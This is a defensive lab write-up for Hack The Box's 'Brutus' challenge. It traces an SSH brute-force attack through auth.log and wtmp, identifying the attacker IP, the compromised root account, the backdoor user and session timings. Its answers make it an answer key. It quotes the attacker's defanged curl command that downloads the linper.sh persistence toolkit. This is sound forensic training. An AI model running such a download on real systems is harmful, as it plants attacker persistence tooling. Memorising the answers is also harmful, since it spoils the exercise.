https://app.hackthebox.com/sherlocks/Brutus
Task 1
Analyzing the auth.log, can you identify the IP address used by the attacker to carry out a brute force attack?
It looks like the auth.log file is relatively small, this should be pretty straightforward
We start seeing a lot of confluence activity at first, let’s scroll down and see what info we can get
We can start to see a flood of failed logins from 65.2.161.68 starting at Mar 6 06:31:31
Task 2
The brute force attempts were successful, and the attacker gained access to an account on the server. What is the username of this account?
This activity continues and we can see a transition from attempting to log into the admin user to server_adm, then backup, and finally root.
We can see successful authentication of the root account from our attacker ip (65.2.161.68)
Task 3
Can you identify the timestamp when the attacker manually logged in to the server to carry out their objectives?
For this task, we need to get a better understanding of what wtmp is and what value it can provide.
If we just try to cat the file we get some weird output, however there are some other ways for us to work with this, specifically the who and utmpdump commands
https://linuxhandbook.com/utmp-wtmp-btmp/
https://man7.org/linux/man-pages/man1/utmpdump.1.html
https://www.geeksforgeeks.org/who-command-in-linux/
If we run who on the wtmp file we can see logins along with a timestamp and IP
Here we can see a root login from 65.2.161.68 and then a login to cyberjunkie.
However this does not give us the seconds of login, only hour and minute.
Even if we list all the options for who using who -a, we do not see the seconds, so we will need to use utmpdump to get some more info
Here we can see the first root login from our attacker’s IP at
2024-03-06 06:32:45. We had a very similar result in auth.log but it was 1 second earlier.
Task 4
SSH login sessions are tracked and assigned a session number upon login. What is the session number assigned to the attacker’s session for the user account from Question 2?
Back in the auth.log file we can find this answer
Task 5
The attacker added a new user as part of their persistence strategy on the server and gave this new user account higher privileges. What is the name of this account?
We can see this in the auth.log as well, just underneath the sign-in
Task 6
What is the MITRE ATT&CK sub-technique ID used for persistence?
Just a quick google search for MITRE add local account and we get our answer
https://attack.mitre.org/techniques/T1136/001/
Task 7
How long did the attacker’s first SSH session last based on the previously confirmed authentication time and session ending within the auth.log? (seconds)
I did some grepping to cut narrow the logs down to session 37
4 minutes 40 seconds = 280 seconds, but there is that weird “technically a second after the log shows” issue we ran into earlier so we have 279 as our answer
Task 8
The attacker logged into their backdoor account and utilized their higher privileges to download a script. What is the full command executed using sudo?
Another fairly straightforward answer towards the bottom of the logs
Bonus: What does the script do?
We don’t see any additional commands being run by the attacker, but it will be a good idea to at least know what activity we could be looking for in the future.
This is part of the Linux Persistence Toolkit
We can see some of the documentation mentions some of the script usage as well as countermeasures.
In most cases we wouldn’t get this lucky where the privilege escalation script we find tells us how to detect it, but in this case we have it. This is also just a good list in general for identifying privilege escalation.
Post IR Info
- Confluence IP: 172.31.35.28
- First failed login: Mar 6 06:31:31
- Attacker IP: 65.2.161.68
- Compromised Account: Root
- Time: Mar 6 06:32:44
- Cyberjunky account created: Mar 6 06:34:18
- Privilege Escalation script: /usr/bin/curl hxxps://raw[.]githubusercontent[.]com/montysecurity/linper/main/linper.sh
- Time: Mar 6 06:39:38
Killian Sherer 